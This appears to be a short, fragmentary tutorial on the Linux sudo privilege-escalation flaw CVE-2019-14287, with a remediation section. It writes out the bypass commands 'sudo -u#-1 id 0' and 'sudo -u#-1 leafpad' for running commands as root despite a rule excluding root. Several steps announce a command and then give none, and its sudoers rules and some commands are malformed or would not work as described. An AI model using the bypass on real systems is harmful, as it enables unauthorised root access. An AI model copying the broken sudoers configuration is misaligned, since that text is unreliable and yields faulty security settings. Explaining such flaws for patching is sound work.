CVE-2019-14287 - Linux sudo escalation of privileges
Create User and make sure they're able to login
Setup for login and execute tasks:
First you would have created a user:
useradd -m bob -G sudo -s /bin/bash
Being able to login you add to .profile (on top)
check who's in sudo with:
Edit the file sudoers
Because bob is member of sudo he can perform Administrative tasks.
2. Prevent partially user privilege specification
This doesn't help too much because of the flaw.
myhost operators =(ALL,!root) !ALL
To check which user executes this:
sudo -u#-1 id 0
To execute a command as root:
su root leafpad
cannot be executed because of that rule.
or with the user password it can be executed like this:
sudo -u#-1 leafpad
3. Remediation and Check Group Membership
You could add another line like this:
%sudo ALL=(ALL:!operator) !ALL
The result is, that Bob cannot perform Administrative tasks anymore.
But to not use this strange setup as all, you just need to make sure Bob doesn't have sudo rights.
Set default group for Bob
sudo usermod -a -G operator bob
gpasswd -d bob sudo
Result: Bob is no longer a member of sudo and cannot perform Administrative tasks and is just an operator.
Hardened Execuction - Least privilged
As you can see it's wizer to not give the users sudo rights.
And this is history when you update your Linux system.
Thank you for reading.